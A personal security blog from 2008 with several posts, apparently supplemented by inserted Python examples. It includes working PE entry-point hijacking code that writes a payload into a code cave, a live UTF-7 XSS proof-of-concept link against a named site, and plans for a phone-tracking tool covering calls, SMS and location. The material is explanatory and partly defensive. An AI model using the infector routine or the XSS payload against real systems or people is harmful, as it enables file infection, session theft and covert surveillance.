Sunday, July 20, 2008
Flow hiJACKing
Application flow hijacking is one of the popular methods used to infect EXE files: malicious code, written as a `\xHEX` byte string, is injected into the application's code section and the instruction pointer is redirected to it, so that it runs as part of the original program before control returns to the real entry point. Read more here: hiJACKing
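The technique described above, as an added example that is not code from the post or from the linked hiJACKing article. It builds a constructed, minimal PE32 image in memory (one `.text` section, not a real executable), redirects `AddressOfEntryPoint` into a code cave holding the payload followed by a `jmp rel32` back to the original entry point, and then applies the coarse entry-point heuristics a scanner would use to spot that redirection. Section and header offsets follow the PE format; the heuristic bit values and the sample image are this example's own choices.

```python
"""Added example (not the original post's code): entry-point flow hijacking on a
constructed PE32 image, plus the coarse checks a scanner applies to the entry point.
Everything works on a bytearray, so it runs anywhere; the sample image is built
in memory and is not a real executable."""
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_SIZE = 40
ENTRY_OFFSET = 16          # AddressOfEntryPoint inside IMAGE_OPTIONAL_HEADER


def pe_layout(img):
    """Return (optional header offset, list of section dicts); raise on a malformed image."""
    if img[:2] != b"MZ":
        raise ValueError("not an MZ image")
    nt = struct.unpack_from("<I", img, 0x3C)[0]               # e_lfanew
    if img[nt:nt + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    nsect = struct.unpack_from("<H", img, nt + 6)[0]
    opt_size = struct.unpack_from("<H", img, nt + 20)[0]
    opt = nt + 24                                              # optional header follows IMAGE_FILE_HEADER
    sections = []
    for i in range(nsect):
        off = opt + opt_size + i * SECTION_SIZE
        name, vsize, va, rawsize, raw = struct.unpack_from("<8sIIII", img, off)
        chars = struct.unpack_from("<I", img, off + 36)[0]    # Characteristics
        sections.append(dict(off=off, name=name.rstrip(b"\0"), vsize=vsize,
                             va=va, rawsize=rawsize, raw=raw, chars=chars))
    return opt, sections


def section_of(sections, rva):
    for s in sections:
        if s["va"] <= rva < s["va"] + s["vsize"]:
            return s
    return None


def entry_point(img):
    opt, _ = pe_layout(img)
    return struct.unpack_from("<I", img, opt + ENTRY_OFFSET)[0]


def hijack_entry(img, payload):
    """Write payload + 'jmp rel32 OEP' into the file slack at the end of the code section
    that holds the entry point, then point AddressOfEntryPoint at it. Returns the new RVA."""
    opt, sections = pe_layout(img)
    oep = struct.unpack_from("<I", img, opt + ENTRY_OFFSET)[0]
    s = section_of(sections, oep)
    need = len(payload) + 5                                    # 5 bytes for E9 rel32
    if s is None or s["vsize"] + need > s["rawsize"]:
        raise ValueError("no code cave large enough in the entry section")
    cave_rva = s["va"] + s["vsize"]
    cave_off = s["raw"] + s["vsize"]
    rel = (oep - (cave_rva + need)) & 0xFFFFFFFF               # displacement from the end of the jmp
    img[cave_off:cave_off + need] = payload + b"\xE9" + struct.pack("<I", rel)
    struct.pack_into("<I", img, s["off"] + 8, s["vsize"] + need)   # grow VirtualSize so the loader maps the cave
    struct.pack_into("<I", img, opt + ENTRY_OFFSET, cave_rva)
    return cave_rva


def entry_point_flags(img):
    """Coarse heuristics: 1 entry outside every section, 2 entry section not code+executable,
    4 entry section writable, 8 a jmp rel32 within 64 bytes of the entry that lands on earlier
    code in the same section (the return-to-OEP stub of a simple infector)."""
    opt, sections = pe_layout(img)
    entry = struct.unpack_from("<I", img, opt + ENTRY_OFFSET)[0]
    s = section_of(sections, entry)
    if s is None:
        return 1
    flags = 0
    code_exec = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE
    if (s["chars"] & code_exec) != code_exec:
        flags |= 2
    if s["chars"] & IMAGE_SCN_MEM_WRITE:
        flags |= 4
    off = entry - s["va"]
    span = min(64, s["vsize"] - off, max(0, s["rawsize"] - off))
    code = bytes(img[s["raw"] + off:s["raw"] + off + span])
    for k in range(span - 4):
        if code[k] == 0xE9:
            target = (entry + k + 5 + struct.unpack_from("<i", code, k + 1)[0]) & 0xFFFFFFFF
            if s["va"] <= target < entry:
                flags |= 8
                break
    return flags


def build_sample_image():
    """Constructed minimal PE32 (assumption, not a real binary): one .text section at RVA
    0x1000, raw offset 0x400, 16 bytes of code (xor eax,eax; ret) in a 0x200-byte raw section."""
    img = bytearray(0x600)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)                   # e_lfanew
    nt = 0x40
    img[nt:nt + 4] = b"PE\0\0"
    struct.pack_into("<HH", img, nt + 4, 0x14C, 1)            # Machine i386, one section
    struct.pack_into("<HH", img, nt + 20, 224, 0x102)         # SizeOfOptionalHeader, EXECUTABLE|32BIT
    opt = nt + 24
    struct.pack_into("<H", img, opt, 0x10B)                   # PE32 magic
    struct.pack_into("<I", img, opt + ENTRY_OFFSET, 0x1000)   # AddressOfEntryPoint
    struct.pack_into("<III", img, opt + 28, 0x400000, 0x1000, 0x200)  # ImageBase, SectionAlignment, FileAlignment
    sec = opt + 224
    struct.pack_into("<8sIIII", img, sec, b".text", 0x10, 0x1000, 0x200, 0x400)
    struct.pack_into("<I", img, sec + 36, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    img[0x400:0x403] = b"\x31\xC0\xC3"
    return img


if __name__ == "__main__":
    img = build_sample_image()
    print("before: entry=%#x flags=%d" % (entry_point(img), entry_point_flags(img)))
    new = hijack_entry(img, b"\x90\x90")                      # two NOPs stand in for the payload
    print("after:  entry=%#x flags=%d" % (new, entry_point_flags(img)))
```

The point of the heuristic is that the hijacked file is still a valid PE whose entry lies in the code section, so a scanner cannot rely on the entry being outside `.text`; what gives the simple infector away is the backward `jmp` to the original entry that the cave needs in order to run the host "as a part of the original code".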
Saturday, July 12, 2008
Tools In The Box
New / old applications in the tools section:
Super ShellCode - Superman shellcode sound track. Instead of running calc as a shellcode I decided to code my own super rintchi shellcode. Open the file with OllyDbg and copy/use the relevant code as a shellcode.
ShareWatcher - A small .NET application that watches NetBIOS connections to your PC. It will alert on and log all connections.
TrafficViewer - Israeli road cameras (watch 8 cams in one window).
PS What's that? data = google.doGoogleSearch(query,maxResults=20)
Enjoy.
Tuesday, July 8, 2008
XSS UTF-7
Lament (my best student so far....) discovered a new XSS vulnerability in the Apache web server (two months ago and still unfixed). Read about Cross-site Scripting here.
This vulnerability shows that we can't blindly TRUST links from known domain names. In the following PoC, walla.co.il is vulnerable just like any other site running the affected Apache server. The payload is UTF-7: once the browser switches to that encoding, `+ADw-` and `+AD4-` decode to `<` and `>`, so text that looks harmless on the wire becomes `<script>`.
PoC
Open a new Internet Explorer window and paste the following link:
http://www.walla.co.il/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ%3Cfont%20size=50%3EDEFACED%3C!xc+ADw-script+AD4-alert('I XSSedYOU!!!')+ADw-/script+AD4---//--
Next, right-click on the page and change the encoding to Auto-Select. BOOM: a message box should pop up.
Conclusion: if you receive a long, obfuscated link, just don't open it. BE AWARE.
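The mechanism behind the PoC, as an added example that is not code from the post. It assumes what the PoC relies on: an error page that echoes the requested path back into HTML without declaring a charset, and a browser whose "Auto-Select" will guess UTF-7 from the `+...-` shift sequences. The server and browser below are simplified stand-ins for Apache and Internet Explorer, not their real logic; the encoder is hand-rolled because Python's own `utf-7` codec leaves `<` and `>` direct and so cannot produce the page's payload.

```python
"""Added example, not code from the original post: how a UTF-7 payload slips past a
filter that looks for '<' and '>', why an error page that echoes the URL without a
declared charset lets the browser decode it as HTML, and why declaring the charset
stops it.  The server and browser models are simplified stand-ins, not Apache or IE."""
import base64
import re


def utf7_encode(text, shift="<>"):
    """Encode the characters in *shift* as UTF-7 shift sequences (+<base64 of UTF-16BE>-)
    and pass everything else through, which reproduces the '+ADw-script+AD4-' shape."""
    out, run = [], []

    def flush():
        if run:
            b64 = base64.b64encode("".join(run).encode("utf-16-be")).decode("ascii")
            out.append("+" + b64.rstrip("=") + "-")
            run.clear()

    for ch in text:
        if ch in shift:
            run.append(ch)
        else:
            flush()
            out.append("+-" if ch == "+" else ch)   # a literal '+' must be escaped in UTF-7
    flush()
    return "".join(out)


def naive_filter_allows(s):
    """A filter that only blocks raw angle brackets: it lets the UTF-7 form through."""
    return "<" not in s and ">" not in s


def error_page(path, declare_charset):
    """Model of a 404 page that echoes the requested path (assumption: this is what the
    PoC exploits).  The weak variant sends no charset; the fixed one pins UTF-8."""
    ctype = "text/html; charset=utf-8" if declare_charset else "text/html"
    body = ("<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1>"
            "<p>The requested URL %s was not found on this server.</p></body></html>" % path)
    return {"Content-Type": ctype}, body.encode("ascii")


def browser_render(headers, body):
    """Simplified 'Auto-Select': honour a declared charset; otherwise, if the body holds
    UTF-7 shift sequences and decodes cleanly as UTF-7, treat it as UTF-7."""
    m = re.search(r"charset=([\w-]+)", headers.get("Content-Type", ""), re.I)
    if m:
        return body.decode(m.group(1))
    if re.search(rb"\+[A-Za-z0-9+/]+-", body):
        try:
            return body.decode("utf-7")
        except UnicodeDecodeError:
            pass
    return body.decode("latin-1")


def script_injected(html):
    return "<script>" in html.lower()


def demo(payload_text="<script>alert('XSS')</script>"):
    """Return (utf7 payload, naive filter passes it?, injected without charset?, injected with charset?)."""
    payload = utf7_encode(payload_text)
    weak = script_injected(browser_render(*error_page("/" + payload, declare_charset=False)))
    fixed = script_injected(browser_render(*error_page("/" + payload, declare_charset=True)))
    return payload, naive_filter_allows(payload), weak, fixed


if __name__ == "__main__":
    print(demo())
```

The fix the example demonstrates is the one that matters server-side: output-encode what you reflect and always send an explicit `charset` in `Content-Type` (or a `<meta>` charset early in the document), so the browser never has to guess an encoding from the bytes an attacker controls.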
Friday, July 4, 2008
iJackPhone
In the last few days, while being paralyzed and unable to move from bed, I had time to do some cool stuff with my iPhone. It all started when my L33T H@X0R bro - Muts invited me to join him on an iPhone journey - installing the Metasploit framework on a new iPhone.
First, we needed to unlock, jailbreak and install Cydia on the iPhone. Good old ZiPhone helped us open the iPhone to third-party applications, and then we installed Cydia with the Installer application. Cydia is a distribution of GNU and BSD's userspace for the iPhone. In other words, if you want to use the bash, chmod, nc, passwd, su and tcpdump commands then you need Cydia.
Once all packages had been installed (apt-get install wget ruby rubygems) we downloaded the Metasploit framework to the iPhone, untarred it and ran it. Fast and simple!!!
Now I'm working on a tool that will track calls, SMS, history and location of the iPhone. Hopefully it will be ready before BlackHat 2008.
A sample script that logs coordinates from Wi-Fi and cellular every $Time can be found here. (still in progress)
REQUIREMENTS
This script is based on the findLocation and findme-muchbetter scripts.
iPhone Remote Shell
iPhone Terminal
PS - Rintchi /me L0V3S Y0U
ג'קי אלטל